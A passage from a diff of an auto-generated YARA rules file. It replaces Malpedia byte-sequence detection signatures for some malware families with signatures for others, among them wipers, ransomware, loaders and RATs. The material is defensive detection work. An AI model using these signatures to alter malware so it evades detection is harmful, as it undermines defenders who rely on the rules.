+		$sequence_7 = { 66f2af 48f7d1 4c8d41ff 498bcc e8???????? 488bcb ff15???????? }
+		$sequence_8 = { 4c8bc0 4883c702 4983c002 eb0f 664489a5a0070000 4c8b4650 498bf8 }
+		$sequence_9 = { 488b4c2468 488b01 ff5010 e9???????? 488b4c2458 488b01 4533c0 }
 
 	condition:
-		7 of them and filesize < 409600
+		7 of them and filesize < 1399808
 }
-rule MALPEDIA_Win_Pillowmint_Auto : FILE
+rule MALPEDIA_Win_Batchwiper_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c0d8452f-d73d-5e3b-840b-1f0850b1a270"
+		id = "8e0f816b-f334-5f53-bde8-8c13e5a1573a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pillowmint"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pillowmint_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.batchwiper"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.batchwiper_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "ae66a0e7e95b7c87f1f3ab1ab6c5145cf23dd8e31b81c9730156e18b839d9281"
+		logic_hash = "7b7cda4dab9bb8ec218294d77768f35a5d54eba78e3d583128b9f7cf9e6690f0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84207,32 +84509,32 @@ rule MALPEDIA_Win_Pillowmint_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 488bd8 488bc8 e8???????? c743203f000000 488d4b28 488d1568f20100 }
-		$sequence_1 = { 48c745af00000000 c6459f00 4c8bc3 488d4d9f e8???????? 48837df710 }
-		$sequence_2 = { 483305???????? 488bcb 488905???????? ff15???????? 488d1575970100 483305???????? 488bcb }
-		$sequence_3 = { 488bcb ff15???????? 488d8dc0020000 ff15???????? 80bd8002000000 7415 488d8d80020000 }
-		$sequence_4 = { 6666660f1f840000000000 48ffce 410fb606 88840c80000000 ffc3 48ffc1 4d8d7601 }
-		$sequence_5 = { 7547 448435???????? 753e 498b17 488d0dce5a0200 e8???????? 488b15???????? }
-		$sequence_6 = { 488b9d98000000 488b03 488bcb ff5008 488bc8 e8???????? 488b03 }
-		$sequence_7 = { 488b80b0000000 c605????????00 6666660f1f840000000000 33d2 48ffcb 48f7f5 80fa0a }
-		$sequence_8 = { 4c8d1d3d900100 418bca 99 2bc2 d1f8 }
-		$sequence_9 = { 488b0d???????? 488bc3 48894908 488b0d???????? 488909 488b0d???????? 48894910 }
+		$sequence_0 = { a1???????? 50 50 ff742408 e8???????? 8d0d2cb14000 5a }
+		$sequence_1 = { 8d0d24b14000 5a e8???????? c744240c02000000 }
+		$sequence_2 = { a1???????? 50 50 ff35???????? ff35???????? e8???????? 8d0d9cb14000 }
+		$sequence_3 = { 8d0d44b14000 e8???????? ba???????? 8d0d48b14000 e8???????? ba???????? 8d0d4cb14000 }
+		$sequence_4 = { ff96e0de0100 09c0 7407 8903 }
+		$sequence_5 = { e8???????? a3???????? 8b1d???????? 21db 7e65 c705????????00000000 8b1d???????? }
+		$sequence_6 = { e8???????? ba???????? 8d0d60b14000 e8???????? ba???????? 8d0d64b14000 e8???????? }
+		$sequence_7 = { 893d???????? c705????????dd424000 c705????????80464000 c705????????da464000 }
+		$sequence_8 = { 8b442408 894514 8b442404 894518 }
+		$sequence_9 = { 46 46 53 686d490100 57 }
 
 	condition:
-		7 of them and filesize < 4667392
+		7 of them and filesize < 270336
 }
-rule MALPEDIA_Win_Punkey_Pos_Auto : FILE
+rule MALPEDIA_Win_Rapid_Ransom_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4e1fe79b-2125-523a-abd5-f08f284bf027"
+		id = "c76663f4-5d9b-5e27-96de-31f5287939c0"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.punkey_pos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.punkey_pos_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_ransom"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rapid_ransom_auto.yar#L1-L162"
 		license_url = "N/A"
-		logic_hash = "be3234349330303fdbacc67e779ee45aced60b2ad5880e7a508a6b6e58a3eaf4"
+		logic_hash = "420102af1054256a36b0f8f07d0daf89ae38632ab058ebfe54352c8eea1f1c3e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84246,32 +84548,37 @@ rule MALPEDIA_Win_Punkey_Pos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 57 8b7d0c f7c600000040 741d }
-		$sequence_1 = { 85c0 740e 56 57 68e7070000 50 }
-		$sequence_2 = { a3???????? ff15???????? 8bf0 85f6 7508 5f 33c0 }
-		$sequence_3 = { 56 57 756b 8b4508 }
-		$sequence_4 = { 56 ffd7 a3???????? 85c0 74ae 5f b801000000 }
-		$sequence_5 = { 85c0 740e 56 57 68e7070000 }
-		$sequence_6 = { a3???????? 85c0 74ae 5f b801000000 }
-		$sequence_7 = { 55 8bec 837d0c01 56 57 756b }
-		$sequence_8 = { ffd7 a3???????? 85c0 74d0 }
-		$sequence_9 = { 5d c20c00 75e5 56 8b7510 }
+		$sequence_0 = { 50 6801000004 6800a40000 ff75f8 ff15???????? }
+		$sequence_1 = { 894dec e8???????? 6a6a 8d87ea010000 8d8e00020000 50 51 }
+		$sequence_2 = { e8???????? 33d2 8d7f01 f7f6 80c261 8857ff 4b }
+		$sequence_3 = { 7402 b301 ff75fc ff15???????? 6a00 ff75f8 }
+		$sequence_4 = { 85c0 7474 8d45fc c745fc00000000 }
+		$sequence_5 = { 6800010000 50 56 8b35???????? 6a00 6a01 }
+		$sequence_6 = { ff74243c ff15???????? 8a4c240e 84c9 }
+		$sequence_7 = { 8d44240e 50 ff7510 8d442440 56 50 ff5514 }
+		$sequence_8 = { 6a00 50 e8???????? 8b45fc 83c40c c60000 }
+		$sequence_9 = { 8b35???????? 33ff c705????????00000000 85f6 }
+		$sequence_10 = { 83c404 8bc6 5e 5f c3 6a09 }
+		$sequence_11 = { 56 e8???????? 83c404 ff75d4 e8???????? 83c404 53 }
+		$sequence_12 = { c745d400000000 50 57 ff15???????? }
+		$sequence_13 = { 83fa1a 0f8cddfeffff 68???????? e8???????? }
+		$sequence_14 = { 58 6bc000 c78034c9410002000000 6a04 58 6bc000 }
 
 	condition:
-		7 of them and filesize < 499712
+		7 of them and filesize < 286720
 }
-rule MALPEDIA_Win_Evilgrab_Auto : FILE
+rule MALPEDIA_Win_Ngioweb_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2f5e9905-bb83-55a1-ac75-ab30097513bc"
+		id = "e5c8d819-248e-5981-b002-cb1c74e63a09"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilgrab"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.evilgrab_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ngioweb"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ngioweb_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "b41ba72c13396de6441cf8d00725c98522c9e1b32d509c53ffe738d9f7f30c83"
+		logic_hash = "f7e87273e17bbe0f3332951c955e0d14e92adbe20014736bed11afb8541960a1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84285,71 +84592,77 @@ rule MALPEDIA_Win_Evilgrab_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 57 8b4324 8d0c40 c1e105 03c8 8d1488 8b4328 }
-		$sequence_1 = { ffd6 83c408 eb06 8b35???????? 8d8c2484030000 68???????? 51 }
-		$sequence_2 = { ff15???????? 89b338050000 897308 897304 89730c bf3f000000 }
-		$sequence_3 = { 6a00 6a01 ff15???????? 8bf8 897dec 85ff }
-		$sequence_4 = { ebb3 8b75c8 8b4e10 51 e8???????? c74610ffffffff 8b45e8 }
-		$sequence_5 = { ff15???????? 83c40c ff8510ebffff 47 ebba 33f6 89b5d8e4ffff }
-		$sequence_6 = { e9???????? 8d8540fcffff 50 8d8d48fdffff 51 8d9548feffff 52 }
-		$sequence_7 = { ffd3 8b4628 50 ffd5 8b462c 85c0 }
-		$sequence_8 = { ffd7 8b442418 50 6a40 ff15???????? 8b542418 8d4c2420 }
-		$sequence_9 = { c685f0efffffd1 68???????? 8d8df1efffff 51 ff15???????? 83c408 8d95f0efffff }
+		$sequence_0 = { 0f852e010000 83c8ff 837d1002 7503 33c0 40 50 }
+		$sequence_1 = { 56 e8???????? 5e c20400 55 8bec 83ec1c }
+		$sequence_2 = { 57 e8???????? 85c0 0f85a7000000 6a12 5b eb28 }
+		$sequence_3 = { 668955c6 66897dc4 66c745c26300 66c745c06900 66c745be4d00 66895dbc }
+		$sequence_4 = { eb74 8d45b0 50 56 e8???????? 8bf0 56 }
+		$sequence_5 = { 8b5de8 ff4dec 8bc8 8b45f8 8bf9 897df8 0f855fffffff }
+		$sequence_6 = { 33c0 85c9 740e 663901 7409 41 }
+		$sequence_7 = { c645f86c c645f764 c645f62e 884dfa e9???????? 3d26c60be2 }
+		$sequence_8 = { c3 55 8bec 6a04 8d4518 50 ff7514 }
+		$sequence_9 = { 8b4544 3bc6 7406 8b08 50 ff5108 8b4550 }
 
 	condition:
-		7 of them and filesize < 327680
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Unidentified_094_Auto : FILE
+rule MALPEDIA_Win_Buer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f5bdd8f3-d974-5222-9555-3631072a29c0"
-		date = "2023-12-06"
-		modified = "2023-12-08"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_094"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_094_auto.yar#L1-L118"
+		id = "5a04d6e0-cd7f-5093-9f8c-3d9d8b9d18a4"
+		date = "2024-10-31"
+		modified = "2024-11-11"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.buer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.buer_auto.yar#L1-L166"
 		license_url = "N/A"
-		logic_hash = "f3d0ed91e99c9ab03a6ddd24a2a28007a40b7e677077c8b725a5a67f32cc52a7"
+		logic_hash = "deb76d78e5600ee9ef4e7b63e09f28c10c8fc78def9e4354c583490d6447dafb"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20231130"
-		malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351"
-		malpedia_version = "20230808"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 890d???????? 57 8915???????? a3???????? 83ceff b9???????? }
-		$sequence_1 = { 6a5c 68???????? e8???????? 83c408 33c9 }
-		$sequence_2 = { 0fb65004 3015???????? 0fb64805 300d???????? 0fb65006 3015???????? }
-		$sequence_3 = { 83c310 ff4d0c 0f857ffeffff 5f }
-		$sequence_4 = { 0fb65004 3015???????? 0fb64805 300d???????? 0fb65006 3015???????? c3 }
-		$sequence_5 = { 884dff 84d2 7902 341b }
-		$sequence_6 = { 3055fd 0fb61401 3055fe 0fb6540101 3055ff 8b55fc 89540102 }
-		$sequence_7 = { 6a00 6a00 6a00 ff15???????? c3 }
-		$sequence_8 = { 80f31b 8ad3 02d2 84db 7903 80f21b }
-		$sequence_9 = { 890d???????? 57 8915???????? a3???????? }
+		$sequence_0 = { 3bc7 7d0f 8a0c46 880c18 }
+		$sequence_1 = { 40 3bc2 7cf1 eb02 }
+		$sequence_2 = { 8d5001 85ff 7504 8bc2 }
+		$sequence_3 = { 894144 8b45f0 03c2 8b55e8 015158 }
+		$sequence_4 = { 8b55e8 015158 8b55d8 894148 8b45dc 03c6 }
+		$sequence_5 = { 60 64a130000000 8b400c 8b4014 8b00 8b4010 8945fc }
+		$sequence_6 = { 8a0c46 880c18 40 3bc2 }
+		$sequence_7 = { 83e801 7420 83e801 740b }
+		$sequence_8 = { 00c0 e9???????? f7da 890c24 8d6801 31c9 be3e000000 }
+		$sequence_9 = { 017708 b803000000 31d2 83c418 5e 5f c3 }
+		$sequence_10 = { 09f2 09ca 09c2 b801000000 ebd0 }
+		$sequence_11 = { 0fb617 47 89f9 83e23f eb11 8b7c2410 8b5c2408 }
+		$sequence_12 = { 01c7 0fa5da d3e3 8b4c2444 }
+		$sequence_13 = { 0fa4c208 c1e008 0fb6cb 09c1 89c8 83c414 }
+		$sequence_14 = { 01cf 0f92c1 08f9 751d }
+		$sequence_15 = { 0f84d7010000 8b442418 8b5c2404 8b54242c 894c2408 01c8 }
 
 	condition:
-		7 of them and filesize < 524288
+		7 of them and filesize < 3031040
 }
-rule MALPEDIA_Win_Graphsteel_Auto : FILE
+rule MALPEDIA_Win_Jupiter_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ee773efd-abc9-59ea-a8a9-5d1bcd00ab52"
+		id = "d73fbb35-6ded-5d84-b301-32a821a6ff22"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphsteel"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.graphsteel_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jupiter"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.jupiter_auto.yar#L1-L110"
 		license_url = "N/A"
-		logic_hash = "c16b3aee4470d6b80d6571382358ae60606e1bc85c16a98c39f469be44f26ba8"
+		logic_hash = "1e4ba4252b0bc544e9c72fa0e946f1d0b7c34c44b8125a03ca9d26d89c2795b2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84363,32 +84676,32 @@ rule MALPEDIA_Win_Graphsteel_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? e9???????? 4c89642420 ba12000000 4531c9 4c89e9 4c8d05e9604900 }
-		$sequence_1 = { e8???????? 4889442458 48895c2428 488d0537c74200 e8???????? 48c7400810000000 48c7401010000000 }
-		$sequence_2 = { e8???????? 89442458 e9???????? 83c301 4d8d5760 4d8b5f38 4c89f1 }
-		$sequence_3 = { c784240001000000000000 48895c2438 8b5c2430 4c89e9 448d6301 4489e2 e8???????? }
-		$sequence_4 = { e9???????? 4889d0 4889d9 e8???????? 4889d0 4889d9 e8???????? }
-		$sequence_5 = { e8???????? 488b6c2470 4883c478 c3 488d05d4323a00 488d1dad9f4a00 e8???????? }
-		$sequence_6 = { e8???????? 488d05fbc53800 488d1db4334900 e8???????? 488d05e8c53800 488d1da1334900 90 }
-		$sequence_7 = { e8???????? 89442444 4189c1 85c0 0f8423020000 488b442448 4885c0 }
-		$sequence_8 = { e8???????? 48ffc2 4839d3 7e14 761a 0fb63410 6690 }
-		$sequence_9 = { bf01000000 4889d6 e8???????? 488b4c2470 488b742450 488b542448 eb39 }
+		$sequence_0 = { 50 6802000000 ff35???????? ff35???????? }
+		$sequence_1 = { 66c705????????0101 c605????????01 c605????????01 66c705????????0101 }
+		$sequence_2 = { c605????????01 66c705????????0101 c605????????01 c605????????01 66c705????????0101 }
+		$sequence_3 = { 8a4146 884105 8b4144 c1f808 884106 }
+		$sequence_4 = { 884104 8a4146 884105 8b4144 c1f808 884106 }
+		$sequence_5 = { 8a4146 884105 8b4144 c1f808 }
+		$sequence_6 = { 66c705????????0101 c605????????01 c605????????01 c605????????01 }
+		$sequence_7 = { c605????????01 66c705????????0101 c605????????01 c605????????01 66c705????????0101 c605????????01 }
+		$sequence_8 = { c1f808 884106 8a4144 884107 }
+		$sequence_9 = { c605????????01 c605????????01 66c705????????0101 c605????????01 }
 
 	condition:
-		7 of them and filesize < 19812352
+		7 of them and filesize < 224112
 }
-rule MALPEDIA_Win_Rhino_Auto : FILE
+rule MALPEDIA_Win_Nightsky_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d85fe477-4e99-588f-91e6-0f1b3f138c82"
+		id = "4a533df6-d2c4-5b9b-962a-f564ffc19b28"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rhino"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rhino_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nightsky"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nightsky_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "00639a2283c7cb43c3dac639e40d4b9a0594ea339862d60e983925c4aeea1ea1"
+		logic_hash = "8ca19ad5375675bc771b33a25611cc75796ee0768ba76a94df6cf267eb73de25"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84402,32 +84715,32 @@ rule MALPEDIA_Win_Rhino_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 895df0 57 895e10 8bfa c7461407000000 668906 8b4d08 }
-		$sequence_1 = { 0316 80790500 8955e0 7419 8b37 8d45ac 50 }
-		$sequence_2 = { 8b7d18 8b4d08 8bc6 c1e802 83e603 8b5108 8b4904 }
-		$sequence_3 = { ff7510 56 e8???????? 83c414 5e 8be5 5d }
-		$sequence_4 = { ff15???????? 2bf0 eb08 ff15???????? 03f0 ff742414 57 }
-		$sequence_5 = { c645fc00 8d7514 ff75fc c645f800 ff75f8 83ec0c 8bfc }
-		$sequence_6 = { 6a01 8d4508 50 8d45e4 68???????? 50 e8???????? }
-		$sequence_7 = { 3bfe 7512 8b33 8bcb ff5620 50 ff75a8 }
-		$sequence_8 = { 8b442424 894804 83c010 897714 89442424 3beb 0f8226fdffff }
-		$sequence_9 = { 8bc7 c1c802 33c8 03d9 837c241000 895c2414 743c }
+		$sequence_0 = { 66d3db 310c24 5b f5 4863c9 }
+		$sequence_1 = { ba08000000 ff15???????? 4c8bf0 4885c0 74e2 488b542460 488bc8 }
+		$sequence_2 = { 8bcf 48f7d0 b8f4400625 f8 d3c0 4002c7 32042a }
+		$sequence_3 = { 41c743e001020304 488d4c2430 41c743e401020304 e8???????? 41b880000000 488d4c2430 488bd7 }
+		$sequence_4 = { 4889442440 4c8d0543150500 488d85b0230000 4889442438 488d15f01e0000 48c744243010000000 e8???????? }
+		$sequence_5 = { 4983f940 72eb e9???????? 488d059e1f0000 48b90000000000000080 488987c8000000 488d0576900200 }
+		$sequence_6 = { b9ffffffff 33ff 4981fffc34d65d 49f7c41926f25d 44894c2420 }
+		$sequence_7 = { 4c8d1d5f570100 4803ed 41ba04000000 4d8d44ed10 498bc8 413818 7431 }
+		$sequence_8 = { 7505 488be9 eb03 4803ed b808000000 48f7e5 490f40c0 }
+		$sequence_9 = { 418bca 48c1e910 83e13f 4533848ea0700400 418bca 48c1e908 4183e23f }
 
 	condition:
-		7 of them and filesize < 1288192
+		7 of them and filesize < 19536896
 }
-rule MALPEDIA_Win_Badencript_Auto : FILE
+rule MALPEDIA_Win_Mangzamel_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ddb7f1a7-8259-5ec8-9b35-e98fb67b2310"
+		id = "b83ef951-bd5b-5678-b2df-639cf3b41b3c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.badencript"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.badencript_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mangzamel"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mangzamel_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "4aaa48768d97770f6e85ee594f356b88c6dabd160111a6a927596e69e9ca03f4"
+		logic_hash = "f6c1e5305bfe68c66a3ef4b49c38bfc3eb7f92ef914438435cd55d230265d8d5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84441,32 +84754,32 @@ rule MALPEDIA_Win_Badencript_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 23c1 eb55 8b1c9d68d14000 56 6800080000 }
-		$sequence_1 = { 8b0c8d48414100 c644112800 85f6 740c }
-		$sequence_2 = { 660fd60f 8d7f08 8b048d04b54000 ffe0 }
-		$sequence_3 = { 57 8d1c85383d4100 33c0 f00fb10b 8b15???????? 83cfff }
-		$sequence_4 = { 7451 83e809 7443 83e801 0f8501010000 c745e0a40f4100 }
-		$sequence_5 = { 660fd60f 8d7f08 8b048d04b54000 ffe0 f7c703000000 7413 }
-		$sequence_6 = { c1fa06 6bc830 8b049548414100 f644082801 7414 8d4508 8945fc }
-		$sequence_7 = { 6bc830 8b049548414100 f644082801 7421 57 e8???????? }
-		$sequence_8 = { 83e03f c1fa06 6bc830 8b049548414100 f644082801 7414 }
-		$sequence_9 = { 7313 8a8750304100 08441619 42 }
+		$sequence_0 = { 8d5e64 33ff 8bcb 897dfc e8???????? }
+		$sequence_1 = { 85c0 7434 8b8e8c000000 8908 eb2a 8b4510 802000 }
+		$sequence_2 = { 8b4008 8945b8 8b4dd8 57 8d45a8 57 50 }
+		$sequence_3 = { 8975f0 c706???????? c745fc02000000 e8???????? 8d8e88000000 c645fc01 }
+		$sequence_4 = { 8d440103 c3 56 57 8b7c2410 6a68 6a00 }
+		$sequence_5 = { ffb18c000000 50 6802501333 eb32 8b01 ff5038 eb30 }
+		$sequence_6 = { 834dfcff 8d8db8fdffff e8???????? 8b4df4 b001 5e 64890d00000000 }
+		$sequence_7 = { 51 50 e8???????? 8bf0 59 3bf3 59 }
+		$sequence_8 = { 83ea00 7421 4a 7412 4a }
+		$sequence_9 = { e8???????? 51 56 57 8b7d08 85ff }
 
 	condition:
-		7 of them and filesize < 335872
+		7 of them and filesize < 360448
 }
-rule MALPEDIA_Win_Cur1_Downloader_Auto : FILE
+rule MALPEDIA_Win_Htprat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8f21da40-d974-5099-af6e-31cd89e26953"
+		id = "6c918b98-1bd6-5c2a-a08e-afe038715c4f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cur1_downloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cur1_downloader_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.htprat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.htprat_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "1c569e94280f8095f5f07b5abf340e9688b7e484a4ea176f880968651b21cc46"
+		logic_hash = "3d036a590536bfddf1556e3ceddf3bf5bcdba928f7034561835a6a007a09cb31"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84480,32 +84793,32 @@ rule MALPEDIA_Win_Cur1_Downloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c684241204000061 c684241304000070 c684241404000073 c684241504000068 c68424160400006f c684241704000074 }
-		$sequence_1 = { 88040a 4863442408 488b4c2430 0fb654240c }
-		$sequence_2 = { 488364243000 4889442428 4c89742420 e8???????? 4c8b442468 4c8d0d5d4effff 498b5008 }
-		$sequence_3 = { 4863442430 488bd0 488b4c2478 e8???????? 48634c2420 0fb600 88440c24 }
-		$sequence_4 = { 488bcb e8???????? 8bf8 e9???????? 41be00010000 4c8d3d57360100 }
-		$sequence_5 = { e8???????? 488d1527ff0100 488d4c2420 e8???????? cc 48895c2410 }
-		$sequence_6 = { 8b8c2468010000 e8???????? 4889442430 c744242040000000 488d442420 4889442428 4c8b442428 }
-		$sequence_7 = { c3 e8???????? 90 cc 33c0 4c8d1d7b44ffff 884118 }
-		$sequence_8 = { 486bc901 8b0408 39442470 7402 eb37 8b442440 }
-		$sequence_9 = { c684245f03000069 c68424600300006f c68424610300006e c684246203000049 c684246303000064 }
+		$sequence_0 = { ff15???????? 85c0 0f8404020000 8b954cefffff 33f6 3bd6 0f84e1000000 }
+		$sequence_1 = { e8???????? 8b45d0 3b45c0 75e0 e9???????? 83f95b }
+		$sequence_2 = { 85c0 0f849a000000 8b8568efffff 03c6 3b8558efffff 7667 8b8394000000 }
+		$sequence_3 = { 897d98 56 33ff 47 }
+		$sequence_4 = { 668b5508 66891448 837e1408 895e10 7204 8b06 eb02 }
+		$sequence_5 = { 8d4dd4 51 50 e8???????? eb02 33c0 }
+		$sequence_6 = { b8???????? e8???????? 8b7508 33db 895de8 c746140f000000 895e10 }
+		$sequence_7 = { 84c0 7422 8d45fc 50 e8???????? 8bf0 59 }
+		$sequence_8 = { 75ec ebb5 8b75bc eb0f }
+		$sequence_9 = { e8???????? 84c0 742c 837e1408 8b4e10 7204 }
 
 	condition:
-		7 of them and filesize < 402432
+		7 of them and filesize < 278528
 }
-rule MALPEDIA_Win_Startpage_Auto : FILE
+rule MALPEDIA_Win_Sneepy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "32039b80-5611-5dab-bcba-b3de61ca7c44"
+		id = "5ef3150e-2bf6-5a09-ba39-87be2aca4160"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.startpage"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.startpage_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sneepy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sneepy_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "264fe8c064e54c165fc131dc307fd06ea57035a4276b77eac419d3cf78ed64b4"
+		logic_hash = "93bb250be962b8e39c384decdfc047f665d0471aa8b95be7ae603f090eace95c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84519,32 +84832,32 @@ rule MALPEDIA_Win_Startpage_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f8455feffff 663906 7407 83c602 3bf3 75f4 3bf3 }
-		$sequence_1 = { 59 85f6 746b ff75f0 6a00 56 e8???????? }
-		$sequence_2 = { 770f 8bc1 50 e8???????? 83c404 32c0 eb08 }
-		$sequence_3 = { 8a430c 8a490c 88420c 8b55f0 884b0c 807b0c01 0f8530010000 }
-		$sequence_4 = { 85ff 7414 8bcf e8???????? 8bcf }
-		$sequence_5 = { e8???????? 50 8d8d90feffff e8???????? 46 3b7334 72e5 }
-		$sequence_6 = { 8bf9 8d7718 56 ff7704 ffd3 8d45ec 0f57c0 }
-		$sequence_7 = { 85d2 7507 b803400080 eb47 8b450c 56 33f6 }
-		$sequence_8 = { 895dfc 895dd4 81fb80000000 7d4d 8b049da0974500 8945d8 85c0 }
-		$sequence_9 = { 5b 8be5 5d c3 ff15???????? 0fb7c8 81c900000780 }
+		$sequence_0 = { 75e6 c6460401 830eff 2b34bd60314100 }
+		$sequence_1 = { 80e17f 3008 8b06 8bc8 c1f905 8b0c8d60314100 83e01f }
+		$sequence_2 = { 83c40c 8bc8 8a10 40 84d2 75f9 8dbdacfeffff }
+		$sequence_3 = { 6801000080 ff15???????? 85c0 754e 8b5508 8bc2 }
+		$sequence_4 = { c1f805 8d3c8560314100 8bf3 83e61f c1e606 }
+		$sequence_5 = { 83f86f 7518 56 e8???????? 8b55fc }
+		$sequence_6 = { e8???????? 83c40c 6a00 68ff000000 8d85c4feffff }
